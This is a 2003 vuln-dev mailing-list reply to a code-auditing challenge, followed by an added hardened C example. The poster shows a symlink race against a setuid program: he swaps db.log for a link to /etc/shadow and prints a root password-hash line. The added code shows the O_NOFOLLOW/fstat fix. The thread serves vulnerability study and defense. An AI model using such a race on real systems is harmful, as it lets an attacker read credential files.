Re: [Vuln-dev Challenge] Challenge #2
From: Thomas Cannon (tcannon_at_noops.org)
Date: 05/24/03
- Previous message: Joel Eriksson: "Re: Frame Pointer Overwriting"
- In reply to: Dave McKinney: "[Vuln-dev Challenge] Challenge #2"
- Next in thread: Joel Eriksson: "Re: [Vuln-dev Challenge] Challenge #2 (SPOILER)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 23 May 2003 16:48:08 -0700
To: vuln-dev@securityfocus.com
>
> /* read log */
> if ( (f1 = fopen("db.log", "r")) == NULL)
>     return 1;
> if (fgets(bfp, BFSIZE, f1) == NULL)
>     return 1;
>
...and if db.log is perhaps a symlink to /etc/shadow?
I assumed the program would be chown'd to root, and set 4755. If this is an
invalid assumption, well, no point in reading any further.
I compiled the program, stopped it after it wrote the input log, made a
symlink, and resumed running the program, with lovely results:
[tcannon@needle]$ rm db.log
[tcannon@needle]$ ln -s /etc/shadow db.log
[tcannon@needle]$ fg
./a.out a a
root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::
I like race conditions. No point in wasting your CPU -- that shadowed
password did get modified before I sent it to the list :-)
Cheers,
--tcannon
PS: Nice strcpy
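The defect the post points at is that the privileged program opens "db.log" by name after it has already been written, so whatever that name resolves to at open time is what gets read. As an added example (not code from the challenge or from this post), here is a hardened replacement for the quoted fopen() pattern: it opens with O_NOFOLLOW so a symlink at the final path component is refused, then checks the type and owner on the descriptor with fstat() rather than on the path, so the decision is made about the object actually opened. The file names and the expected owner are constructed for the demo.

```c
// Added example: hardened open for a log file read by a privileged program.
// Not the challenge's code. Paths under /tmp are constructed for the demo.
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

// Open `path` read-only, refusing to follow a symlink at the last component,
// then require a regular file owned by `expected_uid`. The checks run on the
// descriptor (fstat), so nothing can be swapped between check and use.
// Returns an fd >= 0 on success, -1 on rejection or error.
int open_log_safely(const char *path, uid_t expected_uid) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                 // a symlink here fails with ELOOP
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != expected_uid) {
        close(fd);
        return -1;
    }
    return fd;
}

// Equivalent of the quoted fopen()+fgets(): read the first line of `path`.
// Returns 1 on success, 0 if the file was rejected or empty.
int read_first_line_safely(const char *path, uid_t expected_uid, char *buf, size_t n) {
    int fd = open_log_safely(path, expected_uid);
    if (fd < 0)
        return 0;
    FILE *f = fdopen(fd, "r");     // wrap the already-vetted descriptor
    if (f == NULL) {
        close(fd);
        return 0;
    }
    int ok = fgets(buf, (int)n, f) != NULL;
    fclose(f);
    return ok;
}

// Demo: write a real log file, point a symlink at it, and show that the
// regular file is read while the symlink is rejected. Returns 1 when the
// hardened open behaves as intended, 0 otherwise, -1 on setup failure.
int demo_symlink_rejected(void) {
    const char *real = "/tmp/example_db.log";        // constructed path
    const char *link = "/tmp/example_db_link.log";   // constructed path
    FILE *f = fopen(real, "w");
    if (f == NULL)
        return -1;
    fputs("sample log line\n", f);
    fclose(f);
    unlink(link);
    if (symlink(real, link) != 0) {
        unlink(real);
        return -1;
    }
    char buf[128];
    int real_ok = read_first_line_safely(real, getuid(), buf, sizeof buf);
    int link_ok = read_first_line_safely(link, getuid(), buf, sizeof buf);
    unlink(link);
    unlink(real);
    return (real_ok == 1 && link_ok == 0) ? 1 : 0;
}

int main(void) {
    printf("regular file read, symlink rejected: %s\n",
           demo_symlink_rejected() == 1 ? "yes" : "no");
    return 0;
}
```

O_NOFOLLOW only covers the last path component; a symlinked directory earlier in the path is still followed, so a privileged program should keep its log in a directory it owns and that unprivileged users cannot write to, or drop privileges before touching any user-influenced path. The ownership check is what makes the fstat() step meaningful: a hard link to a root-owned file is not a symlink, but it still fails the st_uid comparison when the expected owner is the unprivileged user.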